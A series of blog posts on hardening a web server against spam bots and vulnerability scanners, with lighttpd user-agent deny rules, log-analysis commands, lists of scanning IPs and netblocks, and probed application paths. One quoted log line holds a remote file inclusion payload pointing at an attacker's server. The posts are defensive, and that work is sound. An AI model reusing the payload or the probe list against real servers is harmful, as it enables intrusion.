White listing User Agents to combat Spam Bots and Scrapers

Posted 2008-03-21 in Spam by Johann.

IncrediBill mentioned white listing user agents to block spam bots and other types of abusers. I then tried white listing instead of the black listing I had been using before.

Here is a short explanation of the difference between black listing and white listing.

Black listing

Black listing means rejecting all requests that fit into a certain pattern.

Black listing looks like this in my web server configuration:

$HTTP["useragent"] =~ "(bad_bot|comment spammer|spambot 1)" {
 url.access-deny = ( "" )
}

This means that all user agent strings containing bad_bot, comment spammer or spambot 1 are served a 403 Forbidden error message.

White listing

White listing means rejecting all requests that do not fit into a certain pattern.

White listing looks as follows in my configuration:

$HTTP["useragent"] !~ "^(Mozilla|Opera)" {
 url.access-deny ( "" )
}

This means that only user agent strings starting with Mozilla or Opera are allowed; everything else is served a 403 Forbidden error message.

The downside of white listing is that the number of allowed user agents can be very large. As an example, user agents of Motorola cell phones start with Motorola-, but some also start with MOT-, MOTOROKR or even motorazr.

Right now, I have more than 100 rules in my white list regular expression.
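Putting the prefixes mentioned so far together, the expression is structured roughly like this (only a sketch; the real list has far more alternatives):

$HTTP["useragent"] !~ "^(Mozilla|Opera|Motorola-|MOT-|MOTOROKR|motorazr)" {
 url.access-deny = ( "" )
}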

Which one is right for me?

I recommend using black lists if you cannot spend much time reading log files and changing your web server’s configuration. Black listing, combined with IP blocking of known abusers, can still be effective in limiting bandwidth theft.

Black listing, however, will not protect you against future bad bots and reincarnations of Russian email harvester outfits. This is where white listing is better.


Exploit and Vulnerability Scanners using libwww-perl

Posted 2008-08-21 in Spam by Johann.

One of the stranger things I see is people scanning for vulnerable servers who always use the same libwww-perl user agent, as in this example:

… "GET /inc/irayofuncs.php?irayodirhack=http://<sploit server>/id??%0D?? HTTP/1.1" 403 4232 "-" "libwww-perl/5.805" "-"

These people definitely come around:

$ grep -c '"libwww-perl' <this week’s log>
111

With the exception of the following outfit, all of the libwww-perl traffic is used solely for vulnerability scanning and attempts to exploit servers.

$ grep '"libwww-perl' <log> | grep -v http
96.244.75.34 … "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808" "-"
70.88.158.109 … "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808" "-"

Obviously, the first thing you should do is white list user agents so that none of the libwww-perl dirt can slip through and get your server hacked.
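If you stick with black listing instead, at least reject the default libwww-perl user agent. A minimal rule in the style of the black list configuration from the white listing post:

$HTTP["useragent"] =~ "libwww-perl" {
 url.access-deny = ( "" )
}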

Statistics

The next thing is to take a look at where this scanning is coming from. I am using the last half year of my log files here.
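The per-IP counts in the table below can be produced with a pipeline along these lines (the log file path is a placeholder):

$ grep '"libwww-perl' <half a year of log files> | awk '{print($1)}' | sort | uniq -c | sort -r -n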

Requests | IP address / Hostname (netblock) | Hosting | Description
-------- | -------------------------------- | ------- | -----------
113 | 216.118.81.182 (216.118.81.0/24) | Site5 hosting, Net Access Corporation, US |
63 | 65.91.249.193 (65.88.0.0/14) | Level3, US |
46 | 217.20.118.202, deltaesports.com (217.20.112.0/20) | netdirekt e. K., DE |
41 | 217.20.116.93, atlas.f2k-server.org (217.20.112.0/20) | netdirekt e. K., DE |
40 | 195.205.178.120, bip.erg-bierun.com.pl (195.205.0.0/16) | Zaklady Tworzyw Sztucznych Erg-Bierun S.A., PL | Black listed on several mail blocklists.
35 | 80.253.99.164, reds.freshwebhosts.com (80.253.96.0/19) | Commercial Collocation Ltd, UK | Black listed as well.
31 | 213.228.155.43, smol-srv01.netvisao.pt (213.228.128.0/18) | Cabovisao SA, PT |
29 | 38.117.65.239 (38.0.0.0/8) | Ravand CyberTech Inc, Performance Systems International Inc., US |
27 | 87.230.77.168, johannes.jarolim.com (87.230.0.0/17) | Hosteurope GmbH, DE |
27 | 216.239.69.227, onnet1.onnet.ca (216.239.64.0/19) | VIF Internet, CA |

As you can see, the IP addresses are all over the place, both geographically and in terms of what they are used for. Also, 113 requests in half a year isn't much, so each system either runs at a stealthy low scanning rate (unlikely) or the scanner processes are discovered sooner or later and the security holes are plugged (more likely).

I haven't had one of my servers hacked, but one thing I would like to find out is whether these computers are exploited beyond the vulnerability scanning.

Websense and how to Block Websense's Constant Abuse

Posted 2008-08-26 in Spam by Johann.

Websense, Inc. is one of the busiest net abusers. Their stealth scanning never stops.

208.80.193.26 … "GET / HTTP/1.0" 403 4232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 3304; SV1; .NET CLR 1.1.4322)" "-"
208.80.193.37 … "GET /blog/music/ HTTP/1.0" 403 4232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Dealio Toolbar 3.1.1; Zango 10.0.370.0)" "-"

If you go through your own log files, you’ll notice that Websense never uses the same user agent twice (simply to never show up in statistics). Here’s how aggressive Websense is:

$ nice gunzip -c <five weeks of log files> | egrep -c '^208.80.19'
414

Over 400 requests in five weeks make Websense a lot more aggressive than vulnerability scanners and forum scanners.

Primarily, the abuse is coming from 208.80.193.0/24.

$ nice gunzip -c <five weeks of log files> | egrep '^208.80.19' | awk '{print($1)}' | sort | uniq -c | sort -r -n
     35 208.80.193.31
     34 208.80.193.44
     33 208.80.193.33
     30 208.80.193.27
     25 208.80.193.37
     25 208.80.193.32
     22 208.80.193.46
     22 208.80.193.30
     21 208.80.193.35
     20 208.80.193.42
     19 208.80.193.45
     18 208.80.193.29
     16 208.80.193.39
     15 208.80.193.40
     14 208.80.193.48
     14 208.80.193.34
     12 208.80.193.47
     11 208.80.193.36
      6 208.80.193.41
      6 208.80.193.38
      5 208.80.193.26
      4 208.80.193.59
      4 208.80.193.50
      2 208.80.193.54
      1 208.80.193.43

Block Websense

Here are Websense's netblocks. Block all of them (a blocking sketch follows the list).

  • 66.194.6.0/24
  • 67.117.201.128
  • 91.194.158.0/23
  • 192.132.210.0/24
  • 204.15.64.0/21
  • 208.80.192.0/21
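One way to block them outright is at the firewall; a sketch assuming a Linux host with iptables (your setup may differ):

# drop all traffic from Websense's netblocks
iptables -A INPUT -s 66.194.6.0/24 -j DROP
iptables -A INPUT -s 67.117.201.128 -j DROP
iptables -A INPUT -s 91.194.158.0/23 -j DROP
iptables -A INPUT -s 192.132.210.0/24 -j DROP
iptables -A INPUT -s 204.15.64.0/21 -j DROP
iptables -A INPUT -s 208.80.192.0/21 -j DROP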


“Toata dragostea mea pentru” Vulnerability Scanners

Posted 2009-01-16 in Spam by Johann.

I have many visits from people who are interested in vulnerability scanners, whether libwww-perl or the “Toata dragostea mea pentru diavola” scanners.
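If you only black list, the name alone is easy to match; a rule in the style of the black list configuration from the white listing post would be along these lines:

$HTTP["useragent"] =~ "Toata dragostea" {
 url.access-deny = ( "" )
}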

Requests

Here are all the requests they made. They have since changed their user agent to something cloaked; their latest one is

62.75.224.201 … "GET /roundcubemail-0.1/bin/msgimport HTTP/1.1" 403 4131 "-" "Toata dragostea mea pentru god    (god     is a girl and this is not a pbot or a browser)"

I wonder what they were smoking…

  • /bin/configure?action=image
  • /bin/msgimport
  • /bt/login_page.php
  • /bug/login_page.php
  • /bugs/login_page.php
  • /bugtrack/login_page.php
  • /bugtracker/login_page.php
  • /cgi-bin/configure?action=image
  • /cube/bin/msgimport
  • /domain_default_page/index.html
  • /email/program/js/list.js
  • /issue/login_page.php
  • /issuetracker/login_page.php
  • /login_page.php
  • /mail/bin/msgimport
  • /mail/program/js/list.js
  • /mail/roundcube/bin/msgimport
  • /mantis/login_page.php
  • /mantisbt/login_page.php
  • /msgimport
  • /portal/login_page.php
  • /program/js/list.js
  • /projects/login_page.php
  • /rc/bin/msgimport
  • /rc/program/js/list.js
  • /round/bin/msgimport
  • /roundcube-0.1/bin/msgimport
  • /roundcube//bin/msgimport
  • /roundcube/bin/msgimport
  • /roundcube/program/js/list.js
  • /roundcubemail-0.1/bin/msgimport
  • /roundcubemail-0.2/bin/msgimport
  • /roundcubemail/bin/msgimport
  • /roundcubemail/program/js/list.js
  • /roundcubewebmail/bin/msgimport
  • /support/login_page.php
  • /tag/configure?action=image
  • /tracker/login_page.php
  • /twiki/bin/configure?action=image
  • /vhcs/domain_default_page/index.html
  • /vhcs2/domain_default_page/index.html
  • /webmail/bin/msgimport
  • /webmail/program/js/list.js
  • /webmail/roundcube/bin/msgimport
  • /wiki/bin/configure?action=image
  • /wiki/cgi-bin/configure?action=image
  • /wiki/cgi/configure?action=image
  • /wikis/bin/configure?action=image
  • HTTP/1.1

The last line is not a mistake – their code just makes malformed HTTP requests. They also do not send any host headers with the requests. In other words, they do not have a list of domains they’re scanning, just IP addresses. Maybe not even that.

Targets

Just by going through the list of requests, we can see that they target

  • webmail systems,
  • bug tracking software,
  • Wikis and
  • unspecified login pages.

Tips

How can you harden your web server against these attacks?

  • No default paths. Never install web applications in default paths suggested by installation instructions.
  • Remove footprints. Most web applications leave notes in the HTML. “Powered by WordPress” is a very common one. Make sure you remove the most obvious hints.
  • No default web sites. Make sure a host header is required. Try wget -d http://<your IP address>. You should not get your home page back. (A configuration sketch follows this list.)
  • Have a strategy for other types of web abuse. Spamtraps, the ability to block by IP netblock and user agent, firewalls.
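For the "no default web sites" tip, a minimal sketch in the lighttpd style used above, with example.com standing in for your real host name:

# serve only requests for the real host name; everything else gets a 403
$HTTP["host"] !~ "^(www\.)?example\.com$" {
 url.access-deny = ( "" )
}

With this in place, wget -d http://<your IP address> sends your IP address as the host header, fails the match and gets a 403 instead of your home page.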

